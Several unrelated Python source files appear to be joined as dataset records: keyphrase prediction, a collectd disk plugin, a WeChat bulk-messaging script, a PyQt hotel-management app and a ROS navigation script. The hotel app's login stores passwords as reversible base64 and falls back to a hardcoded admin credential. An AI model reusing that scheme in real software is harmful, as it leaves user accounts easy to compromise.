generate_dataset():\n test_dataset_name = 'kp20k'\n src_fields = ['title', 'abstract']\n trg_fields = ['keyword']\n parser = argparse.ArgumentParser(\n description='preprocess_testset.py',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n # **Preprocess Options**\n parser.add_argument('-source_dataset_root_dir', default='test/',\n help=\"The path to the source data (raw json).\")\n\n parser.add_argument('-output_path_prefix', default='data/',\n help=\"Output file for the prepared data\")\n\n config.preprocess_opts(parser)\n opt = parser.parse_args([])\n\n print(\"Loading Vocab...\")\n opt.vocab_path = os.path.join(opt.output_path_prefix, 'kp20k', 'kp20k.vocab.pt')\n print(os.path.abspath(opt.vocab_path))\n word2id, id2word, vocab = torch.load(opt.vocab_path, 'rb')\n print('Vocab size = %d' % len(vocab))\n\n # for test_dataset_name in test_dataset_names:\n opt.source_test_file = os.path.join(opt.source_dataset_root_dir, '%s_testing.json' % (test_dataset_name))\n\n # output path for exporting the processed dataset\n opt.output_path = os.path.join(opt.output_path_prefix, test_dataset_name)\n if not os.path.exists(opt.output_path):\n os.makedirs(opt.output_path)\n\n print(\"Loading test data...\")\n\n tokenized_test_pairs = pykp.io.load_src_trgs_pairs(source_json_path=opt.source_test_file,\n dataset_name=test_dataset_name,\n src_fields=src_fields,\n trg_fields=trg_fields,\n 
valid_check=True,\n opt=opt)\n\n print(\"Exporting complete dataset\")\n\n # pykp.io.process_and_export_dataset(tokenized_test_pairs,\n # word2id, id2word,\n # opt,\n # opt.output_path,\n # dataset_name=test_dataset_name,\n # data_type='test')\n return pykp.io.process_dataset(tokenized_test_pairs,\n word2id, id2word,\n opt,\n opt.output_path,\n dataset_name=test_dataset_name,\n data_type='test')\n\n\nclass KeyphrasePredictor(object):\n \"\"\"docstring for KeyphrasePredictor.\"\"\"\n def __init__(self):\n super(KeyphrasePredictor, self).__init__()\n self.model_opts = config.init_opt(description='predictor')\n # self.vocab_path = self.model_opts.vocab#os.path.join(self.model_opts.data, 'kp20k', 'kp20k.vocab.pt')\n # parser = argparse.ArgumentParser(description='predictor',formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n # config.preprocess_opts(parser)\n # self.opt = parser.parse_args([])\n self.load()\n\n def load(self):\n word2id, id2word, vocab = torch.load(self.model_opts.vocab, 'rb')\n self.model_opts.word2id = word2id\n self.model_opts.id2word = id2word\n self.model_opts.vocab = vocab\n self.model = init_model(self.model_opts)\n self.generator = SequenceGenerator(self.model,\n eos_id=self.model_opts.word2id[pykp.io.EOS_WORD],\n beam_size=self.model_opts.beam_size,\n max_sequence_length=self.model_opts.max_sent_length\n )\n\n\n\n def preprocess_input(self,src_str):\n test_dataset_name='kp20k'\n clean_src_str = self.preprocess_query(src_str)\n tokenized_test_pairs = pykp.io.get_tokenized_pairs(clean_src_str,self.model_opts,True)\n return pykp.io.process_dataset(tokenized_test_pairs,\n self.model_opts.word2id, self.model_opts.id2word,\n self.model_opts,\n dataset_name=test_dataset_name,\n data_type='test')\n\n def process(self,input_str,top_n=8):\n one2one,one2many = self.preprocess_input(input_str)\n # test_data_loaders, word2id, id2word, vocab = load_vocab_and_testsets(self.opt,one2one,one2many)\n pin_memory = torch.cuda.is_available()\n testset_name = 'kp20k'\n logger.info(\"Loading test dataset %s\" % testset_name)\n # testset_path = os.path.join(opt.test_dataset_root_path, testset_name, testset_name + '.test.one2many.pt')\n # test_one2many = torch.load(testset_path, 'wb')\n test_one2many_dataset = KeyphraseDataset(one2many, word2id=self.model_opts.word2id, id2word=self.model_opts.id2word, type='one2many', include_original=True)\n test_one2many_loader = KeyphraseDataLoader(dataset=test_one2many_dataset,\n collate_fn=test_one2many_dataset.collate_fn_one2many,\n num_workers=self.model_opts.batch_workers,\n max_batch_example=self.model_opts.beam_search_batch_example,\n max_batch_pair=self.model_opts.beam_search_batch_size,\n pin_memory=pin_memory,\n shuffle=False)\n # test_one2many_loaders = [test_one2many_loader]\n # for testset_name, test_data_loader in zip(['kp20k'], test_one2many_loaders):\n # test_data_loader = test_one2many_loader\n logger.info('Evaluating %s' % testset_name)\n output = predict_beam_search(self.generator, test_one2many_loader, self.model_opts,\n title='test_%s' % testset_name,\n predict_save_path=None)#opt.pred_path + '/%s_test_result/' % (testset_name))\n\n return output[:top_n]\n\n def removeSpecialChars(self, inputstring):\n import string\n translator = str.maketrans('', '', string.punctuation.replace('-',''))\n # inputstring = 'string with \"punctuation\" inside of it! Does this work? 
I hope so.'\n # print('hello', inputstring)\n inputstring = inputstring.decode('utf-8').translate(translator)\n return inputstring\n\n def preprocess_query(self, inputstring):\n inputstring = inputstring.lower().strip().encode('ascii',errors='ignore')\n inputstring = self.removeSpecialChars(inputstring)\n inputstring = self.removeWhiteSpace(inputstring)\n return inputstring\n\n def removeWhiteSpace(self, inputstring):\n outputstring = \" \".join(inputstring.split())\n return outputstring\n\n\ndef load_vocab_and_testsets(opt,test_one2one,test_one2many):\n logger.info(\"Loading vocab from disk: %s\" % (opt.vocab))\n word2id, id2word, vocab = torch.load(opt.vocab, 'rb')\n opt.word2id = word2id\n opt.id2word = id2word\n opt.vocab = vocab\n logger.info('#(vocab)=%d' % len(vocab))\n logger.info('#(vocab used)=%d' % opt.vocab_size)\n\n pin_memory = torch.cuda.is_available()\n test_one2many_loaders = []\n\n for testset_name in ['kp20k']:\n logger.info(\"Loading test dataset %s\" % testset_name)\n # testset_path = os.path.join(opt.test_dataset_root_path, testset_name, testset_name + '.test.one2many.pt')\n # test_one2many = torch.load(testset_path, 'wb')\n test_one2many_dataset = KeyphraseDataset(test_one2many, word2id=word2id, id2word=id2word, type='one2many', include_original=True)\n test_one2many_loader = KeyphraseDataLoader(dataset=test_one2many_dataset,\n collate_fn=test_one2many_dataset.collate_fn_one2many,\n num_workers=opt.batch_workers,\n max_batch_example=opt.beam_search_batch_example,\n max_batch_pair=opt.beam_search_batch_size,\n pin_memory=pin_memory,\n shuffle=False)\n\n test_one2many_loaders.append(test_one2many_loader)\n logger.info('#(test data size: #(one2many pair)=%d, #(one2one pair)=%d, #(batch)=%d' % (len(test_one2many_loader.dataset), test_one2many_loader.one2one_number(), len(test_one2many_loader)))\n logger.info('*' * 50)\n\n return test_one2many_loaders, word2id, id2word, vocab\n\n\ndef main():\n opt = config.init_opt(description='predict_keyphrase.py')\n logger = config.init_logging('predict_keyphrase', opt.exp_path + '/output.log', redirect_to_stdout=False)\n\n logger.info('EXP_PATH : ' + opt.exp_path)\n\n logger.info('Parameters:')\n [logger.info('%s : %s' % (k, str(v))) for k, v in opt.__dict__.items()]\n\n logger.info('====================== Checking GPU Availability =========================')\n if torch.cuda.is_available():\n if isinstance(opt.device_ids, int):\n opt.device_ids = [opt.device_ids]\n logger.info('Running on %s! 
devices=%s' % ('MULTIPLE GPUs' if len(opt.device_ids) > 1 else '1 GPU', str(opt.device_ids)))\n else:\n logger.info('Running on CPU!')\n\n try:\n one2one,one2many = generate_dataset()\n test_data_loaders, word2id, id2word, vocab = load_vocab_and_testsets(opt,one2one,one2many)\n model = init_model(opt)\n generator = SequenceGenerator(model,\n eos_id=opt.word2id[pykp.io.EOS_WORD],\n beam_size=opt.beam_size,\n max_sequence_length=opt.max_sent_length\n )\n\n for testset_name, test_data_loader in zip(['kp20k'], test_data_loaders):\n logger.info('Evaluating %s' % testset_name)\n output = predict_beam_search(generator, test_data_loader, opt,\n title='test_%s' % testset_name,\n predict_save_path=None)#opt.pred_path + '/%s_test_result/' % (testset_name))\n print(output)\n except Exception as e:\n logger.error(e, exc_info=True)\n\ndef main():\n import pandas as pd\n # import sys\n # sys.argv = 'python -data data_custom/kp20k/kp20k -vocab data_custom/kp20k/kp20k.vocab.pt -exp_path \"./exp-custom/attn_general.input_feeding.copy/%s.%s\" -train_from \"exp-custom/attn_general.input_feeding.copy/kp20k-custom.ml.copy.20190102-100747/model/kp20k-custom.ml.copy.epoch=5.batch=40.total_batch=480.model\" -model_path \"./model/attn_general.input_feeding.copy/%s.%s\" -pred_path \"./pred-custom/attn_general.input_feeding.copy/%s.%s\" -exp \"kp20k-custom\" -batch_size 256 -bidirectional -copy_attention -beam_size 16 -beam_search_batch_size 32 -train_ml -attention_mode general -input_feeding -min_src_seq_length 5 -vocab_size 2107 -device_ids 0'.replace('\"','').split(' ')\n kp = KeyphrasePredictor()\n data = pd.read_csv('./kbsearch.solrcore2.csv',encoding='utf-8')\n extract_products = lambda x:';'.join(kp.process(x))\n extract_products(data['question'].iloc[1])\n data['products'] = data['question'].apply(extract_products)\n data.to_csv('output.csv')\n\nif __name__ == '__main__':\n main()\n # kp = KeyphrasePredictor()\n # kp.process('what would you charge me on pay order non-correspondent bank for privilege special scheme savings account')\n","sub_path":"predict_keyphrase.py","file_name":"predict_keyphrase.py","file_ext":"py","file_size_in_byte":12346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"391506864","text":"#!/usr/bin/env python\n#coding:utf-8\n'''\nThis plugin is use to collect information of disk utilization!\nYou need to install systate on your system!\n'''\n\nimport os\n\nimport collectd\n\n\nNAME = 'disk_utilization'\nVERBOSE = True\n\ndef get_disk_utilization():\n data_name = []\n data_num = []\n count = 0\n for line in os.popen('iostat -d -x -k 1 1').readlines():\n if count == 3:\n data_1 = line.split()\n data_num.append(data_1[-1])\n if count == 2:\n data_2 = line.split()\n data_name.append(data_2[-1][1:])\n count += 1\n return zip(data_name, data_num)\n\ndef log(t, message):\n \"\"\" Log messages to collectd logger\n \"\"\"\n if t == 'err':\n collectd.error('{0}: {1}'.format(NAME, message))\n elif t == 'warn':\n collectd.warning('{0}: {1}'.format(NAME, message))\n elif t == 'verb':\n if VERBOSE:\n collectd.info('{0}: {1}'.format(NAME, message))\n else:\n collectd.info('{0}: {1}'.format(NAME, message))\n\ndef configure_callback(conf):\n \"\"\" Config data from collectd\n \"\"\"\n log('verb', 'configure_callback Running')\n global NAME, VERBOSE\n for node in conf.children:\n if node.key == 'Name':\n NAME = node.values[0]\n elif node.key == 'Verbose':\n if node.values[0] == 'False':\n VERBOSE = False\n else:\n log('warn', 'Unknown config key: 
{0}'.format(node.key))\n\n\ndef read_callback():\n \"\"\" Prepare data for collectd\n \"\"\"\n log('verb', 'read_callback Running')\n\n stats = get_disk_utilization()\n\n if not stats:\n log('verb', 'No statistics received')\n return\n\n for metric,values in stats:\n log('verb', 'Sending value: {0} {1}'.format(metric, values))\n value = collectd.Values(plugin=NAME)\n value.type = 'percent'\n value.type_instance = metric\n value.values = [str(values)]\n value.dispatch()\n\ncollectd.register_config(configure_callback)\ncollectd.warning('Initialising {0}'.format(NAME))\ncollectd.register_read(read_callback)\n\n\n\n\n","sub_path":"collectd_plugins/disk_utilization.py","file_name":"disk_utilization.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"281499442","text":"# 导入项目中所需要的包\n#coding:utf-8\n\nimport pandas as pd\nimport numpy as np\nimport itchat\n\n# 调用login()函数以登录网页微信\nitchat.login()\n\n#不选择自己的账号信息\ndataset = itchat.get_friends(update=True)[1:]\n\n# dataset选择部分列,\ndata = [{'NickName':item['NickName'], 'RemarkName':item['RemarkName'], 'UserName':item['UserName']} for item in dataset]\n\n#转换为dataframe\ndf_all = pd.DataFrame()\nfor i in range(len(data)):\n df = pd.DataFrame([data[i]],index=[data[i]['NickName']])\n df_all =df_all.append(df)\n \n#群发消息\nwhile True:\n usernames=[]\n while len(usernames)==0:\n remarknmae_pre = input('请输入群发成员前缀:')\n df = df_all[df_all[\"RemarkName\"].str.find(remarknmae_pre, start=0, end=None)>=0]\n usernames = df['UserName'].tolist()\n print('群发人数共{}人:'.format(len(usernames)),df['RemarkName'].values.tolist(),'\\n')\n message = input('请输入群发内容:')\n print('\\n')\n confirm =input('是否确认发送(y/n):')\n\n if confirm != 'y':\n print('\\n','再来一次','\\n')\n continue\n else: \n for username in usernames: \n itchat.send(message,toUserName = username)\n print('\\n','发送成功!')\n ","sub_path":"broadcast_msg.py","file_name":"broadcast_msg.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"315199432","text":"#\n\n#===================#\n# by Farhad Sotothe #\n# ----------------- #\n# sotothe@gmail.com #\n#===================# \n\nimport sys\nfrom functools import partial\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom datetime import datetime, date\nimport base64\n\nimport model\nimport view\nimport statics\n\n\nclass Login(QtWidgets.QDialog):\n def __init__(self, parent=None):\n super(Login, self).__init__(parent)\n self.textName = QtWidgets.QLineEdit(self)\n self.textPass = QtWidgets.QLineEdit(self)\n self.textName.setPlaceholderText(\"Username\")\n self.textPass.setPlaceholderText(\"Password\")\n self.textPass.setEchoMode(QtWidgets.QLineEdit.Password)\n self.buttonLogin = QtWidgets.QPushButton('Login', self)\n self.buttonLogin.clicked.connect(self.handleLogin)\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(self.textName)\n layout.addWidget(self.textPass)\n layout.addWidget(self.buttonLogin)\n self.users = self.read_auth_info()\n\n @staticmethod\n def _hash(s):\n bh = base64.b64encode(s.encode())\n return str(bh[:10] + bh[-10:])[2:-1]\n\n def read_auth_info(self):\n auth_path = 'modules/auth'\n try:\n with open(auth_path) as f:\n users = []\n for line in f:\n users.append(eval(line)) \n except:\n users = [{'uname':'admin4', 'passwd':'MTIzNDQ0MTIzNDQ0'}]\n\n return users\n\n def handleLogin(self):\n successful = False\n for u in self.users:\n if self.textName.text() == 
u.get('uname'):\n if self._hash(self.textPass.text()) == u.get('passwd'):\n successful = True\n self.accept()\n else:\n break\n if not successful:\n QtWidgets.QMessageBox.warning(self, 'Error', 'Wrong username or password')\n\n\nclass Balance_DLG(QtWidgets.QDialog):\n def __init__(self, t, r, arch, db, parent=None):\n super().__init__(parent)\n self._db = db\n self._current = None\n\n # setupUi\n self.verticalLayout = QtWidgets.QVBoxLayout(self)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.label = QtWidgets.QLabel(self)\n self.label.setObjectName(\"label\")\n self.verticalLayout.addWidget(self.label)\n self.textBrowser = QtWidgets.QTextBrowser(self)\n self.textBrowser.setObjectName(\"textBrowser\")\n self.verticalLayout.addWidget(self.textBrowser)\n self.widget = QtWidgets.QWidget(self)\n self.widget.setObjectName(\"widget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label_2 = QtWidgets.QLabel(self.widget)\n self.label_2.setObjectName(\"label_2\")\n self.horizontalLayout.addWidget(self.label_2)\n self.lineEdit_pay = QtWidgets.QLineEdit(self.widget)\n self.lineEdit_pay.setObjectName(\"lineEdit_pay\")\n self.lineEdit_return = QtWidgets.QLineEdit(self.widget)\n self.lineEdit_return.setObjectName(\"lineEdit_return\")\n self.horizontalLayout.addWidget(self.lineEdit_pay)\n self.horizontalLayout.addWidget(self.lineEdit_return)\n self.pushButton = QtWidgets.QPushButton(self.widget)\n self.pushButton.setObjectName(\"pushButton\")\n self.horizontalLayout.addWidget(self.pushButton)\n self.verticalLayout.addWidget(self.widget)\n self.init(t, r)\n self.find(t, r, arch)\n\n # retranslateUi\n _translate = QtCore.QCoreApplication.translate\n self.label.setText(_translate(\"Dialog\", \"Description:\"))\n self.label_2.setText(_translate(\"Dialog\", \"Account balance:\"))\n self.lineEdit_pay.setPlaceholderText(_translate(\"Dialog\", \"Pay\"))\n self.lineEdit_return.setPlaceholderText(_translate(\"Dialog\", \"Return\"))\n self.pushButton.setText(_translate(\"Dialog\", \"Pay\"))\n\n # Actions\n self.pushButton.clicked.connect(self.handle_payment)\n\n def init(self, t, r):\n self.textBrowser.setText(f'''\n Room: {t.item(r,1).text()}\n Arrival: {t.item(r,2).text()}\n Departure: {t.item(r,3).text()}\n Guests: {t.item(r,4).text()}\n Peyment for the room: {t.item(r,5).text()}\n Peyment for the services: {t.item(r,6).text()}\n Account balance: {t.item(r,7).text()}\n Comment: {t.item(r,8).text()}''')\n\n def find(self, t, r, arch):\n for a in arch:\n c1 = a._room_no == t.item(r,1).text()\n c2 = a._start == t.item(r,2).text()\n c3 = a._guests == t.item(r,4).text()\n\n if c1 and c2 and c3:\n self._current = a\n\n def handle_payment(self):\n try:\n pay_ = float(self.lineEdit_pay.text())\n except:\n pay_ = 0\n\n try:\n return_ = float(self.lineEdit_return.text())\n except:\n return_ = 0\n\n self._current.pay(return_-pay_, date.today().strftime(\"%Y/%m/%d\"), self._db)\n self.close()\n\nclass Controller:\n def __init__(self):\n self._app = QtWidgets.QApplication(sys.argv)\n font = QtGui.QFont()\n font.setFamily(font.defaultFamily())\n self._app.setFont(font)\n self._model = model.Model()\n self._view = view.View(QtWidgets.QMainWindow())\n self.signals()\n self.init()\n\n def signals(self):\n self._view.sig_conf_room_insert.connect(self.conf_room_insert)\n self._view.sig_conf_room_update.connect(self.conf_room_update)\n 
self._view.sig_conf_room_remove.connect(self.conf_room_remove)\n self._view.sig_conf_mini_insert.connect(self.conf_mini_insert)\n self._view.sig_conf_mini_update.connect(self.conf_mini_update)\n self._view.sig_conf_mini_remove.connect(self.conf_mini_remove)\n self._view.sig_checkin_submit.connect(self.checkin_submit)\n self._view.sig_reserve.connect(self.reserve)\n self._view.sig_revoke.connect(self.revoke)\n self._view.sig_expire.connect(self.expire)\n self._view.sig_invoice_changed.connect(self.update_room_invoice)\n self._view.sig_checkout.connect(self.checkout)\n self._view.sig_archive_search.connect(self.archive_search)\n self._view.sig_archive_edit.connect(self.archive_edit)\n\n def init(self):\n self._view.rooms = self._model.rooms\n self._view.minibar = self._model.minibar\n self._view.stays = self._model.stays\n self._view.reservations = self._model.reservations\n self.archive_search()\n self._view.update()\n \n\n # ~~~~~~~~~~~< conf_room >~~~~~~~~~~~\n def conf_room_insert(self):\n new = self._model.Room(self._view.lineEdit_config_room_no.text(),\n self._view.spinBox_config_rooms_beds.value(),\n self._view.checkBox_config_rooms_out_of_service.isChecked(),\n self._view.textEdit_config_rooms_description.toPlainText())\n \n msg = self._model.Room.insert(new, self._model.db.conf)\n if msg:\n self._view.show_message(msg)\n else:\n self._model.rooms.append(new)\n self.init()\n\n def conf_room_update(self):\n t = self._view.tableWidget_config_rooms\n k = t.item(t.currentRow(),0).text()\n\n for r in self._model.rooms:\n if r._number == k:\n break\n\n r._number = self._view.lineEdit_config_room_no.text()\n r._beds = self._view.spinBox_config_rooms_beds.value()\n r._oos = self._view.checkBox_config_rooms_out_of_service.isChecked()\n r._description = self._view.textEdit_config_rooms_description.toPlainText()\n\n r.update(self._model.db.conf)\n self.init()\n\n def conf_room_remove(self):\n t = self._view.tableWidget_config_rooms\n k = t.item(t.currentRow(),0).text()\n \n for r in self._model.rooms:\n if r._number == k:\n break\n\n r.remove(self._model.db.conf)\n self._model.rooms.remove(r)\n self.init()\n\n # ~~~~~~~~~~~< conf_minibar >~~~~~~~~~~~\n def conf_mini_insert(self):\n new = self._model.Mini(self._view.lineEdit_config_minibar_item.text(),\n self._view.lineEdit_config_minibar_price.text(),\n self._view.textEdit_config_minibar_comment.toPlainText())\n \n msg = self._model.Mini.insert(new, self._model.db.conf)\n if msg:\n self._view.show_message(msg)\n else:\n self._model.minibar.append(new)\n self.init()\n\n def conf_mini_update(self):\n t = self._view.tableWidget_config_minibar\n k = t.item(t.currentRow(),0).text()\n\n for m in self._model.minibar:\n if m._item == k:\n break\n\n m._item = self._view.lineEdit_config_minibar_item.text()\n m._price = self._view.lineEdit_config_minibar_price.text()\n\n m.update(self._model.db.conf)\n self.init()\n\n def conf_mini_remove(self):\n t = self._view.tableWidget_config_minibar\n k = t.item(t.currentRow(),0).text()\n\n for m in self._model.minibar:\n if m._item == k:\n break\n\n m.remove(self._model.db.conf)\n self._model.minibar.remove(m)\n self.init()\n\n # ~~~~~~~~~~~< invoice >~~~~~~~~~~~\n def invoice(self):\n inv = []\n d = self._view.new_stay.get('_duration')\n n = 'Night'\n res = '-'\n res_comment = self._view.new_stay.get('res_comment')\n\n if int(d) > 1:\n n += 's'\n\n res_inv = self._view.new_stay.get('_invoice')\n if res_inv:\n inv.append(res_inv[0])\n\n inv.append({\n 'date': date.today().strftime(\"%Y/%m/%d\"),\n 'item': n,\n 
'price': self._view.new_stay.get('_price'),\n 'count': d,\n 'paid': self._view.new_stay.get('_payment'),\n 'comment': res\n })\n return inv\n\n # ~~~~~~~~~~~< reserve >~~~~~~~~~~~\n def reserve(self):\n new = self._model.Reservation(self._view.new_stay.get('_room_no'),\n self._view.new_stay.get('_guests'),\n self._view.new_stay.get('_start'),\n self._view.new_stay.get('_end'),\n self._view.new_stay.get('_comment',''),\n self._view.new_stay.get('_price',''),\n self._view.new_stay.get('_prepayment'),\n date.today().strftime(\"%Y/%m/%d\"))\n \n new.insert(self._model.db.working)\n self._model.reservations.append(new)\n # self.init()\n\n # ~~~~~~~~~~~< checkin_submit >~~~~~~~~~~~\n def checkin_submit(self):\n new = self._model.Stay(self._view.new_stay.get('_room_no'),\n self._view.new_stay.get('_guests'),\n self._view.new_stay.get('_start'),\n self._view.new_stay.get('_end'),\n self._view.new_stay.get('_comment',''),\n self.invoice())\n \n new.insert(self._model.db.working)\n self._model.stays.append(new)\n # self.init()\n\n # ~~~~~~~~~~~< room_invoice >~~~~~~~~~~~\n def update_room_invoice(self):\n if self._view.tabWidget.currentIndex() == 2:\n room_number = self._view.comboBox_services_room_search.currentText()\n elif self._view.tabWidget.currentIndex() == 3:\n room_number = self._view.comboBox_checkout_stay_room.currentText()\n\n view_stay = None\n model_stay = None\n\n for s in self._view.stays:\n if s._room_no == room_number:\n view_stay = s\n\n for s in self._model.stays:\n if s._room_no == room_number:\n model_stay = s\n\n if view_stay and model_stay:\n msg = model_stay.update_invoice(view_stay._invoice, self._model.db.working)\n if not msg == '':\n print(msg)\n self._view.show_message(msg)\n\n # ~~~~~~~~~~~< checkout >~~~~~~~~~~~\n def checkout(self):\n room_number = self._view.comboBox_checkout_stay_room.currentText()\n\n for s in self._model.stays:\n if s._room_no == room_number:\n stay = s\n\n try:\n stay.insert(self._model.db.archive, archive=True)\n stay.remove(self._model.db.working)\n self._model.stays.remove(stay)\n except:\n print('There is no such a stay!')\n\n self.init()\n\n # ~~~~~~~~~~~< expire >~~~~~~~~~~~\n def expire(self):\n for r in self._view.reservations:\n if datetime.strptime(r._end, '%Y/%m/%d').date() <= date.today():\n try:\n r.insert(self._model.db.archive)\n r.remove(self._model.db.working)\n self._model.reservations.remove(r)\n except:\n print('There is no such a reservation!')\n \n # ~~~~~~~~~~~< revoke >~~~~~~~~~~~\n def revoke(self):\n res = self._view.current_res\n try:\n res.remove(self._model.db.working)\n self._model.reservations.remove(res)\n except:\n pass\n\n self.init()\n\n # ~~~~~~~~~~~< revoke >~~~~~~~~~~~\n @staticmethod\n def colorize(l):\n if l > 0:\n return statics.colors('red')[0]\n elif l < 0:\n return statics.colors('yellow')[0]\n\n\n # ~~~~~~~~~~~< archive_search >~~~~~~~~~~~\n def archive_search(self):\n self._model.refresh_archive()\n arch = []\n t = 0\n combo = self._view.comboBox_archive.currentText()\n\n if combo == 'Room no.':\n fltr = self._view.lineEdit_archive.text()\n\n for a in self._model.archived:\n if fltr == '' or a._room_no == fltr:\n arch.append(a)\n\n elif combo == 'Date':\n fltr = self._view.dateEdit_archive.date().toPyDate().strftime(\"%Y/%m/%d\")\n\n for a in self._model.archived:\n if fltr == a._start or fltr == a._end:\n arch.append(a)\n\n elif combo == 'Guests':\n fltr = self._view.lineEdit_archive.text()\n\n for a in self._model.archived:\n if fltr == '' or fltr in a._guests:\n arch.append(a)\n\n elif combo == 
'Balance':\n fltr = self._view.checkBox_archive_debtor.isChecked(), self._view.checkBox_archive_creditor.isChecked()\n\n for a in self._model.archived:\n if (fltr[0] and float(a._level)>0) or (fltr[1] and float(a._level)<0) or not (fltr[0] or fltr[1]):\n arch.append(a)\n\n\n self._view.tableWidget_archive.setRowCount(0)\n for a in arch:\n t += float(a._room_total_payment) + float(a._service_total_payment)\n self._view.add_to_table(self._view.tableWidget_archive, \n a._type_,\n a._room_no,\n a._start,\n a._end,\n a._guests,\n a._room_total_payment,\n a._service_total_payment,\n a._level,\n a._comment,\n color=self.colorize(float(a._level)))\n\n self._view.lineEdit_archive_total.setText(str(t))\n\n # ~~~~~~~~~~~< archive_edit >~~~~~~~~~~~\n def archive_edit(self):\n t = self._view.tableWidget_archive\n b = t.item(t.currentRow(),7)\n if not b == None:\n if not float(b.text()) == 0:\n blnc = Balance_DLG(t, t.currentRow(), self._model.archived, self._model.db.archive)\n blnc.exec_()\n self._model.refresh_archive()\n self.archive_search()\n\n # ~~~~~~~~~~~< run >~~~~~~~~~~~\n def run(self):\n self._view.ui.show()\n return self._app.exec_()\n\n\n#if __name__ == '__main__':\napp = QtWidgets.QApplication(sys.argv)\nlogin = Login()\n\nif login.exec_() == QtWidgets.QDialog.Accepted:\n c = Controller()\n sys.exit(c.run())","sub_path":"modules/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":16673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"64769930","text":"import unittest\n\nimport explore_australia\n\nclass TestVersion(unittest.TestCase):\n\n def test_version(self):\n \"Check version is correct\"\n self.assertEqual(explore_australia.__version__, '0.0.1')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_version.py","file_name":"test_version.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"133996576","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\nimport rospy\nimport actionlib\nimport pygame\nimport time\nfrom sensor_msgs.msg import Image\nimport subprocess\nfrom std_msgs.msg import String\nimport cv_bridge\nimport cv2\nfrom threading import Lock\n#move_base_msgs\nfrom move_base_msgs.msg import *\n\nnumber = [\n [-9.9475019784, 1.1746130689, 0.3454174, 0.938449153995], # 413\n [-8.5395602, 0.0006826564, 0.259789427, 0.9656674894], # left 412\n [-2.07413604, -7.242282841, 0.340837238, 0.940137933] #right 412 \n ]\nnot_detected = True\noccupied = False\ncnt = 1\n\n#number = [\n# [2.68418028507, 6.32836545207, 0.995296423679, 0.0968763594063], # 251\n# [2.97993330195, 7.78973598536, 0.989846215693, 0.142142426034], # 252\n# [5.90723436272, 11.3865553893, -0.259246136482, 0.965811286287], # 255\n# [4.65333389466, 8.9399562701, -0.268687279702, 0.963227463129], # 254\n# [3.67297275746, 5.9756919696, -0.274823414105, 0.961494717125] # 255\n# ]\n\n#between = [\n# [5.93028237029, 11.497519954, -0.827577087007, 0.561277344421], #after 255\n# [4.6901158, 8.90323, -0.762108, 0.64744938], #after 254\n# [3.6016501, 6.0969845, -0.8243698, 0.566051] #after 253\n#]\n\ndef detect_callback(data):\n global not_detected, occupied, cnt, lock\n \n lock.acquire()\n if cnt == 1:\n cnt = 0\n lock.release()\n #pygame.mixer.music.stop()\n #occupied = True\n return 0\n\ndef image_callback(data):\n bridge = cv_bridge.CvBridge()\n \n try:\n image = bridge.imgmsg_to_cv2(data, 
\"bgr8\")\n except cv_bridge.CvBridgeError as e:\n print(e)\n\n\n # Display the resulting image\n \n cv2.imshow(\"Image window\", image)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n \n return\n \n\ndef simple_move():\n global not_detected, cnt, lock\n \n #Simple Action Client\n sac = actionlib.SimpleActionClient('move_base', MoveBaseAction )\n\n #create goal\n goal = MoveBaseGoal()\n #rate = rospy.Rate(10)\n i = 0\n while not rospy.is_shutdown():\n \n #set goal\n not_detected = True\n goal.target_pose.pose.position.x = number[i][0]\n goal.target_pose.pose.position.y = number[i][1]\n goal.target_pose.pose.orientation.z = number[i][2]\n goal.target_pose.pose.orientation.w = number[i][3]\n goal.target_pose.header.frame_id = 'map'\n goal.target_pose.header.stamp = rospy.Time.now()\n\n #start listner\n sac.wait_for_server()\n\n #send goal\n sac.send_goal(goal)\n\n #finish\n result = sac.wait_for_result()\n \n #print result\n print(result)#sac.get_result())\n \n \n \n print(\"Round\", i)\n if result:\n lock.acquire()\n cnt = 1\n lock.release()\n start_time = time.time()\n pygame.mixer.music.load('/home/shinyao/catkin_ws/knock.mp3')\n pygame.mixer.music.play(-1)\n\n '''\n if i != 1:\n while time.time() - start_time < 20.0: \n pass\n else:\n time.sleep(20)\n\n if cnt == 0:\n pygame.mixer.music.load('/home/shinyao/catkin_ws/newyear.mp3')\n pygame.mixer.music.play(-1)\n print('i see you')\n \n time.sleep(10)\n \n print(\"Ready to leave the door\")\n '''\n\n while time.time() - start_time < 20.0:\n if cnt == 0:\n pygame.mixer.music.stop()\n pygame.mixer.music.load('/home/shinyao/catkin_ws/newyear.mp3')\n pygame.mixer.music.play(2)\n print('i see you')\n\n time.sleep(10)\n break\n\n\n\n\n\n pygame.mixer.music.stop()\n #time.sleep(11)\n #cv2.destroyAllWindows()\n #not_detected = True\n else:\n print(\"failed to reach goal\")\n \n print(\"Round\",i,\" bye\")\n i += 1\n if i >= len(number):\n return\n #rate.sleep()\n\n'''\ngoal.target_pose.pose.position.x = 3.42265447927\ngoal.target_pose.pose.position.y = 1.09429176934\ngoal.target_pose.pose.orientation.z = -0.491279655277\ngoal.target_pose.pose.orientation.w = 0.871001894551\n'''\n\n\nif __name__ == '__main__':\n try:\n lock = Lock()\n pygame.init()\n \n #pygame.mixer.music.play(0)\n \n rospy.init_node('simple_move')\n rospy.Subscriber(\"face_detect\", String, detect_callback)\n #rospy.spin()\n simple_move()\n except rospy.ROSInterruptException:\n 